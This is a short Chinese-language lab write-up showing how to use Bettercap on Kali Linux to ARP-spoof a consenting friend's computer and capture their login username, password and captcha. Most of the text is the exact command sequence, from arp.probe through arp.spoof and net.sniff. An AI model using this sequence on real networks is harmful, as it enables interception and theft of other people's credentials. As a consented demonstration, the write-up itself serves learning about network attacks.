系统环境:Kali-Linux
使用工具:Bettercap
写在前面:以下内容均为实验时所截取的过程,受害者机器也是和小伙伴事先说明好才进行攻击的,过程比较顺利,仅做娱乐,切勿将这些技术用于不法途径。
安装 Bettercap
apt install bettercap

安装完成后,命令行输入:
bettercap -h
查看bettercap能使用的一些指令
使用 ifconfig 指令查看自己的网卡信息,eth0 这张网卡是当前使用的
用指令绑定该网卡,通过help指令查看bettercap的可用指令,最后是模块的启动情况
bettercap -iface eth0
help
开启主动探测功能,来探测当前网络下的其他主机ip
arp.probe on
此时可以看见 10.66.17.x 该网段下有十台主机在运行,我们选取 10.66.17.60(小伙伴的电脑) 这台主机进行arp欺骗,通过以下指令进行伪装,实现截获受害者发送和收到的数据包
set arp.spoof.fullduplex true
set arp.spoof.targets 10.66.17.60
arp.spoof on
set net.sniff.local true
net.sniff on
启动 net.sniff 后,会收到大量的数据包,在控制台里疯狂跳包(如果受害者主机在浏览网页之类的话)
然后让小伙伴进入事先准备好的网站尝试登陆等操作
抓到了如上图所示的一些信息,可以看出小伙伴登陆用的用户名、密码和验证码等信息,本次攻击成功。
结束后记得输入指令让攻击暂停,不然网络一直在抓包会导致网页卡顿等问题
net.sniff off
arp.spoof off